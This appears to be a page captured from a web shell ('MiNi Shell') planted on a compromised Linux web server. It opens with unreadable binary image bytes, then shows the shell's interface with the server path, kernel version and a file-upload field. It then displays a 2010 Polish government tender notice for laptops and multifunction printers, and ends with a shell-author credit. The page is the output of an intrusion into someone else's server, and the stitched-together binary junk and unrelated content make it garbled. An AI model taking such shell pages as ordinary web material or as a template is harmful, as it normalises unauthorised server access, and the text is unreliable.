JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101130/389746-N-2010.html

<p class="kh_header"><b>Poznań: Zakup i dostawa sprzętu komputerowego dla Wydziału Instytucji Pośredniczącej 
w Certyfikacji Wielkopolskiego Urzędu Wojewódzkiego w Poznaniu</b><br>
<b>Numer ogłoszenia: 389746 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Urząd Wojewódzki w Poznaniu , Al. Niepodległości 16/18, 61-713 Poznań, woj. wielkopolskie, tel. 061 8541300, faks 061 8541204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu komputerowego dla Wydziału Instytucji Pośredniczącej 
w Certyfikacji Wielkopolskiego Urzędu Wojewódzkiego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa 2 sztuk komputerów przenośnych (laptopów) wraz z systemem operacyjnym, oprogramowaniem antywirusowym i oprogramowaniem biurowym oraz 2 sztuk urządzeń wielofunkcyjnych dla pracowników Wydziału Instytucji Pośredniczącej w Certyfikacji Wielkopolskiego Urzędu Wojewódzkiego w Poznaniu.

Zamówienie stanowi wykonanie projektu pn. Zakup infrastruktury informatycznej dla pracowników Instytucji Pośredniczących w Certyfikacji zaangażowanych w proces certyfikacji wydatków do Komisji Europejskiej w 2010 roku. Zadanie to jest realizowane w ramach Działania 2.2 Infrastruktura Informatyczna Programu Operacyjnego Pomoc Techniczna 2007-2013. Jest ono współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego (85 %) oraz budżetu państwa (15%). Bezpośrednim celem zakupów jest zapewnienie sprawnego funkcjonowania systemów informatycznych w Instytucji Pośredniczącej w Certyfikacji oraz prawidłowego i efektownego wykonywania przez nią zadań w zakresie poświadczenia prawidłowości poniesienia wydatków w ramach regionalnych programów operacyjnych. Realizacja  tego zadania przyczyni się również do efektywnej realizacji zapisów Narodowych Strategicznych Ram Odniesienia.

1.	Zaoferowany komputer przenośny (laptop) musi posiadać następujące (lub lepsze) parametry techniczne: 

procesor dwurdzeniowy z obsługą systemów 64 bitowych, posiadający częstotliwość taktowania procesora - minimum 2,1GHz;
obsługa  wirtualizacji sprzętowej procesora;
matryca LED17 o rozdzielczości 1440x900; 
-	pamięć RAM  4GB DDR3 1066MHz ;
-	dysk twardy 320 GB S-ATA II;
-	optyczny napęd wbudowany DVD+-RW DL;
-	wbudowana karta bezprzewodowa WiFi IEEE 802.11bgn;
-	wbudowana karta sieciowa Ethernet 10-100-1000 Mbs;
-	karta grafiki z pamięcią autonomiczną 512MB zgodna z DirectX 10;
-	karta dźwiękowa zintegrowana;
-	wejściewyjście audio;
-	4 x USB 2.0,  ExpressCard;
-	wyjście D-Sub , wyjście HDMI ;
-	maksymalna waga 3,4 kg;
-	zasilanie minimum 6-komorowy akumulator litowo-jonowy;
-	zasilacz sieciowy; 
-	mysz optyczna 3 przyciskowa z rolką, 800dpi, USB;
-	dodatkowa klawiatura standardowa ze złączem USB, klawisze niskoprofilowe;
-	podkładka pod mysz;
-	torba;
-	listwa zasilająca 5 gniazd z filtrem przeciwprzepięciowym i wyłącznikiem sieciowym,
-	MS Windows 7 Professional PL (64-bit) OEM + nośnik (CD-ROM/DVD) lub oprogramowanie równoważne;
-	MS Office 2010 SB PL OEM lub równoważne;
-	system antywirusowy NOD32 lub równoważne;
-	komplet sterowników.
Każdy komputer przenośny (laptop), mysz optyczna, klawiatura oraz listwa zasilająca musi spełniać wymagania dyrektywy CE oraz posiadać naniesione oznaczenie CE.
Do każdego komputera przenośnego (laptopa) musi być dołączona karta gwarancyjna z wyszczególnionym numerem seryjnym, a także instrukcja obsługi w języku polskim.
Dopuszcza się składanie ofert równoważnych, na inne oprogramowanie systemowe niż wymienione powyżej, pod warunkiem, że Wykonawca zapewni (zrealizuje), bez dodatkowych kosztów pełną funkcjonalność dostarczonego sprzętu, w środowisku informatycznym Zamawiającego.
Na obudowie każdego komputera przenośnego (laptopa) musi być naklejona etykieta certyfikatu autentyczności (COA) systemu operacyjnego oraz naniesiony numer seryjny.
2.	Urządzenie wielofunkcyjne.
1.	Zaoferowane urządzenia wielofunkcyjne muszą posiadać następujące (lub lepsze) parametry techniczne: 
1	Drukarka laserowa kolorowa:
-	23 str.min. w A4 (druk czarno-biały);
-	23 str.min. w A4 (druk kolorowy);
-	automatyczny moduł druku dwustronnego;
-	maksymalny czas wydruku pierwszej strony 18 sekundy (druk czarno-biały);
-	maksymalny czas wydruku pierwszej strony 18 sekundy (druk kolorowy);
-	emulacja PLC6, PostScript;
2	Kserokopiarka (kopiarka):
-	jednorazowa liczba kopii dokumentu 90;
-	powiększenie 25~400% (platen), 25~100% (ADF);
-	rozdzielczość druku 1200x600 DPI;
-	maksymalny czas wydruku pierwszej strony 25 sekund (druk czarno-biały);
-	maksymalny czas wydruku pierwszej strony 30 sekund (druk kolorowy);
-	23 str.min. w A4 (druk czarno-biały i kolorowy);
3	Skaner:
-	rozdzielczość skanera kolorowego 600x600 DPI;
-	funkcje skanowania do PC, e-mail, USB;
4	Faks:
-	kompatybilność ITU-T Grupa 3;
-	szybkość przesyłu 33 kbs
-	rozdzielczość 300x300 DPI (Mono);
5	Ogólne:
-	podajnik kasetowy na minimum 250 arkuszy papieru;
-	standardowa wbudowana pamięć 128 MB;
-	funkcja automatycznego druku dwustronnego;
-	Interfejsy: USB Hi-Speed 2.0, Ethernet 10100TX;
-	obciążenie miesięczne 60.000 stron A4;
-	wyposażony w standardowy toner czarny o wydajności 2,500 stron formatu A4;
-	wyposażony w standardowy toner żółtyamarantowybłękitny o wydajności 2,000 stron formatu A4;
Do każdego urządzenia wielofunkcyjnego musi być dołączona karta gwarancyjna z wyszczególnionym numerem seryjnym, a także instrukcja obsługi w języku polskim.
Każde urządzenie wielofunkcyjne musi spełniać wymagania dyrektywy CE 
oraz wymagania normy energetycznej Energy Star. Sprzęt musi posiadać naniesione oznaczenia CE, Energy Star oraz umieszczony numer seryjny.
Wymagania ogólne.
Dostarczony sprzęt, musi spełniać wymagania obowiązujących przepisów, w tym być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 21 sierpnia 2007 roku w sprawie zasadniczych wymagań dla sprzętu elektrycznego (Dz.U. z 2007 r. Nr 155 poz. 1089). W szczególności musi posiadać oznaczenie CE, potwierdzające zgodność tego sprzętu z przepisami rozporządzenia. Ocena zgodności i oznaczenie znakiem CE musi dotyczyć całego wyrobu, a nie tylko jego elementów składowych.
Monitory komputerów przenośnych (laptopów) muszą być zgodne z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz.U. Nr 148, poz. 973).

Zaoferowany sprzęt musi być nieużywany i wyprodukowany po 1 stycznia 2010 r.
W celu potwierdzenia spełnienia wymaganych warunków, związanych z przedmiotem zamówienia Wykonawcy dostarczą łącznie z ofertą potwierdzone kopie wymaganych certyfikatów:
1.	Certyfikaty CE dla: komputera przenośnego (laptopa), zasilacza laptopa, urządzenia wielofunkcyjnego, klawiatury, myszy i listwy zasilającej.
2.	Certyfikat Energy Star lub potwierdzony wydruk o posiadaniu przez urządzenie certyfikatu ze strony http:www.energystar.gov dla urządzenia wielofunkcyjnego.

Zamawiający wyraża zgodę na złożenie powyższych certyfikatów również w jednym z języków powszechnie używanych w handlu międzynarodowym.
Dostarczą łącznie z ofertą dokumentację w języku polskim, potwierdzającą spełnienie warunków i parametrów technicznych zaoferowanego przez Wykonawców sprzętu. Zamawiający dopuszcza w charakterze dokumentacji, potwierdzone przez Wykonawcę, wydruki ze stron internetowych producenta lub autoryzowanego dystrybutora sprzętu, zawierające wszystkie parametry sprzętu wyszczególnione przez Zamawiającego. W przypadku zamieszczenia wydruków ze strony internetowej Wykonawca poda adres strony, z której zostały pobrane wydruki. W opisie technicznym należy bezwzględnie podać nazwę producenta i typ oferowanego sprzętu umożliwiający jego jednoznaczna identyfikację.
Zamawiający nie dopuszcza stwierdzenia, że zaoferowany sprzęt spełnia wymagania, bez dołączenia dokumentacji, o której mowa powyżej.

Uwaga !
Wymagana gwarancja. 
Na dostarczony sprzęt Wykonawca udziela 36 miesięcznej gwarancji. Termin gwarancji liczy się od dnia podpisania protokołu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Certyfikaty CE dla: komputera przenośnego (laptopa), zasilacza laptopa, urządzenia wielofunkcyjnego, klawiatury, myszy i listwy zasilającej,
Certyfikat Energy Star lub potwierdzony wydruk o posiadaniu przez urządzenie certyfikatu ze strony http:www.energystar.gov dla urządzenia wielofunkcyjnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia zmian do umowy, jeżeli zmiany są korzystne dla Zamawiającego albo nie można było ich przewidzieć w chwili zawarcia umowy. W takim przypadku sporządzony zostanie stosowny aneks do umowy. Warunki zmiany umowy zostaną ustalone pomiędzy Zamawiającym a Wykonawcą.
2.	W szczególności dopuszczalna będzie zmiana umowy dotycząca:
1)  zmiany świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia,
2)	zmiany terminu płatności z przyczyn nie leżących po stronie Zamawiającego.
3.	Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej. 
4.	Zmiana umowy, o której mowa w ust. 2, następuje na pisemny wniosek strony umowy, zawierający wykazanie okoliczności umożliwiających dokonanie zmiany, to jest wskazanie przedmiotu i zakresu zmiany, uzasadnienie  zmiany, wpływ  zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poznan.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielkopolski Urząd Wojewódzki w Poznaniu Al. Niepodległości 16/18 pokój 457, budynek A, poniedziałek od 08:00 do 16:00, wtorek-piątek od 07:30 do 15:30 lub za pobraniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 10:00, miejsce: Sekretariat Biura Organizacyjno-Administracyjnego Wielkopolskiego Urzędu Wojewódzkiego w Poznaniu, Al. Niepodległości 16/18 pokój 373, budynek A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie stanowi wykonanie projektu pn. Zakup infrastruktury informatycznej dla pracowników Instytucji Pośredniczących w Certyfikacji zaangażowanych w proces certyfikacji wydatków do Komisji Europejskiej w 2010 roku. Zadanie to jest realizowane w ramach Działania 2.2 Infrastruktura Informatyczna Programu Operacyjnego Pomoc Techniczna 2007-2013. Jest ono współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego (85 %) oraz budżetu państwa (15%). Bezpośrednim celem zakupów jest zapewnienie sprawnego funkcjonowania systemów informatycznych w Instytucji Pośredniczącej w Certyfikacji oraz prawidłowego i efektownego wykonywania przez nią zadań w zakresie poświadczenia prawidłowości poniesienia wydatków w ramach regionalnych programów operacyjnych. Realizacja  tego zadania przyczyni się również do efektywnej realizacji zapisów Narodowych Strategicznych Ram Odniesienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com